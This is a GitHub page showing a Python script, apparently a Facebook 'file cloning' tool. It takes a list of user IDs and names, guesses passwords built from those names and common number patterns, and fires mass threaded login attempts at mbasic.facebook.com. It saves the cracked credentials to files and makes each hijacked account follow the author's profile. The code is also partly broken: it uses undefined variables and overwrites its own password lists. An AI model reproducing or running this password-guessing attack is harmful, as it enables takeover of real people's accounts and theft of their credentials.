This repository has been archived by the owner on Jan 1, 2023. It is now read-only.
forked from mushuH/OPEN-SOURCE-
-
Notifications
You must be signed in to change notification settings - Fork 0
/
BXB-1.py.txt
333 lines (299 loc) · 11.7 KB
/
BXB-1.py.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
#!/usr/bin/python3
#admin notes
#ua change kr lo Jo es main add hain sab local hain ab kam nhi kr rhy
#dont forget share and sport
#Thank You
import os
try:
import requests
except ImportError:
print('\n [✓] installing requests !...\n')
os.system('pip install requests')
try:
import concurrent.futures
except ImportError:
print('\n [✓] installing futures !...\n')
os.system('pip install futures')
try:
import bs4
except ImportError:
print('\n [✓] installing bs4 !...\n')
os.system('pip install bs4')
import requests, os, re, bs4,platform, sys, json, time, random, datetime, subprocess, threading, itertools,base64,uuid,zlib
from concurrent.futures import ThreadPoolExecutor as javed
from datetime import datetime
from bs4 import BeautifulSoup
ct = datetime.now()
n = ct.month
bulan = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'Agustus', 'September', 'October', 'November', 'December']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulan[nTemp]
P = '\x1b[1;97m' #
M = '\033[1;31m' #
H = '\033[1;32m' #
K = '\x1b[1;97m' #
B = '\x1b[1;97m' #
U = '\x1b[1;97m' #
O = '\x1b[1;97m' #
N = '\x1b[0m' #
my_color = [
P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
data,data2={},{}
aman,cp,salah=0,0,0
ubahP,fuck,pwBaru=[],[],[]
ok = []
cp = []
id = []
user = []
loop = 0
url_lookup = "https://lookup-id.com/"
url_mb = "https://mbasic.facebook.com"
url_ip = "https://www.httpbin.org/ip"
header_grup = {"user-agent": "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"}
bulan_ttl = {"01": "January", "02": "February", "03": "March", "04": "April", "05": "May", "06": "June", "07": "July", "08": "Augustus", "09": "September", "10": "October", "11": "November", "12": "December"}
cebok = "NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+",
done = False
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = """
######### ## ## #########
## ## ## ## ## ##
## ## ## ## ## ##
## ## ## ## ## ##
########## ## ## ##########
## ## # ## ## ##
## ## ## ## ## ##
## ## ## ## ## ##
########## ## ## ##########
\x1b[1;90m_______________________________________
|Author | Javed Iqbal (Sad-Boy) |
|Fb Id | Javed Iqbal Sad Boy |
|GitHub | BALOOXH-BRAND |
|Vol | 6.2.0 |
|______________________________________|
"""
def hasil(OK,cp):
if not len(OK) != 0:
pass
if len(cp) != 0:
print('\n\n \x1b[1;97m Total OK : \x1b[1;97m %s \x1b[1;97mBXB_OK.txt' % (H, P, str(len(ok))))
print(' \x1b[1;97m Total CP :\x1b[1;97m %s \x1b[1;97mBXB_CP.txt' % (H, P, str(len(cp))))
input("\x1b[1;97mPress enter to back BXB Menu ")
Sad_Boy()
def Sad_Boy():
os.system('clear')
print(logo)
ipm = requests.get(url_ip).json()
todz = ''
IP = ipm['origin']
print
print(' [1] Start File Cloning')
print(' [2] Join Group')
print(' [E] exit ')
print('')
_Sad_Boy___ = input(' [?] Choose option : ')
if _Sad_Boy___ in ('1', '01'):
__xxx__().Sad_Boyx(id)
if _Sad_Boy___ in ('2', '02'):
os.system('https://facebook.com/groups/347577560720737/')
if _Sad_Boy___ in ('E', 'ee'):
pass
class __xxx__:
def __init__(self):
self.id = []
def Sad_Boyx(self,id):
os.system("clear")
print(logo)
self.cnt = input('Put File Name : ')
self.id = open(self.cnt).read().splitlines()
os.system('clear')
print(logo)
print("")
___worldwide___ = ('y')
if ___worldwide___ in ('yes','Yes','Y', 'y'):
self.__pler__()
else:
print(' [!] Choose Correct One');
self.Sad_Boyx(id)
def __metode__(self, user, __chi__, cebok):
global ok,cp,loop
sys.stdout.write(f"\r \x1b[1;97m[BXB] {loop}|{len(self.id)} [OK][{len(ok)}]")
sys.stdout.flush()
try:
for pw in __chi__:
pw = pw.lower()
session=requests.Session()
header = {
"Host": cebok,
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": f"https://{cebok}",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": ua,
"Accept": "*/*",
"X-Requested-With": "com.facebook.katana",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-User": "empty",
"Sec-Fetch-Dest": "document",
'Referer': f'https://{cebok}/login/device-based/password/?uid={aide}&flow=login_no_pin&refsrc=deprecated&_rdr',
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7"}
r = session.post(f"https://{cebok}/login/device-based/validate-password/?shbl=0",data=alicia,cookies=cook,headers=oppai,allow_redirects=False)
das = {
"lsd":re.search('name="lsd" value="(.*?)"', str(r.text)).group(1),
"jazoest":re.search('name="jazoest" value="(.*?)"', str(r.text)).group(1),
"uid":user,
"flow":"login_no_pin",
"pass":pw,
"next":"https://developers.facebook.com/tools/debug/accesstoken/"
}
header1 = {
"Host": cebok,
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": f"https://{cebok}",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": ua,
"Accept": "*/*",
"X-Requested-With": "com.facebook.katana",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-User": "empty",
"Sec-Fetch-Dest": "document",
'Referer': f'https://{cebok}/login/device-based/password/?uid={aide}&flow=login_no_pin&refsrc=deprecated&_rdr',
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7"}
po = session.post(f"https://{cebok}/login/device-based/validate-password/?shbl=0",data=alicia,cookies=cook,headers=oppai,allow_redirects=False)
if 'c_user' in session.cookies.get_dict():
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
print(f"\r{H} [BXB-OK] {user} | {pw}")
wrt = '%s|%s' % (user,pw)
ok.append(wrt)
open('BXB_OK.txt' , 'a').write('%s\n' % wrt)
self.follow(session,coki)
break
elif 'checkpoint' in session.cookies.get_dict():
try:
tokenz = open('.token.txt').read()
cp_ttl = session.get(f'https://graph.facebook.com/{user}?fields=birthday&access_token={tokenz}').json()['birthday']
month, day, year = cp_ttl.split('/')
month = bulan_ttl[month]
print('\r%s [BXB-CP] %s | %s ' % (M, user, pw))
wrt = '%s|%s' % (user,pw)
cp.append(wrt)
open('BXB_CP.txt' , 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
print('\r%s [BXB-CP] %s | %s ' % (M, user, pw))
wrt = '%s|%s' % (user,pw)
cp.append(wrt)
open('BXB_CP.txt' , 'a').write('%s\n' % wrt)
break
else:
continue
loop+=1
except:
self.__metode__(user, pw, cebok)
def follow(self, session, coki):
r = BeautifulSoup(session.get('https://mbasic.facebook.com/profile.php?id=100013655833793', cookies={'cookie': coki}).text, 'html.parser')
get = r.find('a', string='Ikuti').get('href')
session.get(('https://mbasic.facebook.com' + str(get)), cookies={'cookie': coki}).text
def __pler__(self):
print('[1] LOW AUTO METHOD')
print('[2] BEST METHOD')
chi = input('\n [?] Choose: ')
if chi == '':
print('\nSelect Correct One')
self.__pler__()
elif chi in ('1', '01'):
os.system("clear")
print(logo)
print(47*"-")
print('\033[1;33m Total IDs : %s ' % len(self.id))
print('\033[1;33m Please Wait...')
print(47*"-")
with javed(max_workers=30) as bxbworld:
for zsb in self.id: # Yo Ndak Tau Kok Tanya Saia
try:
uid, name = zsb.split('|')
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
pwx = [name, xz[0]+"123", xz[0]+"786", xz[1]+"12345", xz[0]+"1234"]
else:
pwx = [name, xz[0]+"123", xz[0]+xz[1], xz[0]+"12345"]
pwx = ["786786"]
pwx = ["112233"]
pwx = ["123456"]
pwx = ["123456789"]
bxbworld.submit(self.__metode__, uid, pwx, "mbasic.facebook.com")
except:
pass
hasil(ok,cp)
elif chi in ('2', '02'):
os.system("clear")
print(logo)
print("\033[1;37m\rEnter Last Name Digits\033[1;37m\n")
p1 = input(' Name + 1 : ')
p2 = input(' Name + 2 : ')
p3 = input(' Name + 3 : ')
p4 = input(' Name + 4 : ')
os.system("clear")
print(logo)
print(47*"-")
print('\033[1;33m Total IDs : %s ' % len(self.id))
print('\033[1;33m Please Wait...')
print(47*"-")
with javed(max_workers=30) as bxbworld:
for zsb in self.id: # Yo Ndak Tau Kok Tanya Saia
try:
uid, name = zsb.split('|')
uid, name + "1234567"
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
pwx = [name, xz[0]+"123", xz[0]+"786", xz[1]+"1234", xz[0]+"12345"]
pwx = [name, xz +"112233" or "1234" or "786" or "0000"]
pwx = [name, xz, "786" "112233" "1234" "12345" "999" "111" "12"]
else:
pwx = [name, xz[0]+"123", xz[0]+"786", xz[1], xz[0]+"12345"]
pwx = ["786786"]
pwx = ["123456"]
pwx = ["123456789"]
bxbworld.submit(self.__metode__, uid, pwx, "mbasic.facebook.com")
except:
pass
hasil(ok,cp)
else:
print('\n Select Valid One')
self.__pler__()
class load:
def __init__(self):
_ = ''
__ = int('30')
___ = int('0')
__ -= 1
___ += 1
for t in range(int("1")):
print('\r Please Wait ....')
sys.stdout.flush()
time.sleep(0.1)
print('\n')
Sad_Boy()